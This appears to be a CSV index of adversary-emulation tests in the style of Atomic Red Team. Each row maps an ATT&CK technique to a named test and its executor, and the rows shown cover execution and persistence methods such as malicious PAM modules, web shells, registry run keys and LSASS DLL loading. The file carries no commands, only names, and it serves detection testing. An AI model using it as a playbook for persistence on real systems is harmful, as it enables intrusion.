execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
execution,T1569.002,System Services: Service Execution,6,Snake Malware Service Create,b8db787e-dbea-493c-96cb-9272296ddc49,command_prompt
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
persistence,T1137.006,Office Application Startup: Add-ins,3,Persistent Code Execution Via Word Add-in File (WLL),95408a99-4fa7-4cd6-a7ef-cb65f86351cf,powershell
persistence,T1137.006,Office Application Startup: Add-ins,4,Persistent Code Execution Via Excel VBA Add-in File (XLAM),082141ed-b048-4c86-99c7-2b8da5b5bf48,powershell
persistence,T1137.006,Office Application Startup: Add-ins,5,Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM),f89e58f9-2b49-423b-ac95-1f3e7cfd8277,powershell
persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1136.001,Create Account: Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
persistence,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistence with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistence via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1098,Account Manipulation,10,Domain Password Policy Check: Short Password,fc5f9414-bd67-4f5f-a08e-e5381e29cbd1,powershell
persistence,T1098,Account Manipulation,11,Domain Password Policy Check: No Number in Password,68190529-069b-4ffc-a942-919704158065,powershell
persistence,T1098,Account Manipulation,12,Domain Password Policy Check: No Special Character in Password,7d984ef2-2db2-4cec-b090-e637e1698f61,powershell
persistence,T1098,Account Manipulation,13,Domain Password Policy Check: No Uppercase Character in Password,b299c120-44a7-4d68-b8e2-8ba5a28511ec,powershell
persistence,T1098,Account Manipulation,14,Domain Password Policy Check: No Lowercase Character in Password,945da11e-977e-4dab-85d2-f394d03c5887,powershell
persistence,T1098,Account Manipulation,15,Domain Password Policy Check: Only Two Character Classes,784d1349-5a26-4d20-af5e-d6af53bae460,powershell
persistence,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,4,Snake Malware Kernel Driver Comadmin,e5cb5564-cc7b-4050-86e8-f2d9eec1941f,powershell
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1505.004,IIS Components,1,Install IIS Module using AppCmd.exe,53adbdfa-8200-490c-871c-d3b1ab3324b2,command_prompt
persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,cc3381fb-4bd0-405c-a8e4-6cacfac3b06c,powershell
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
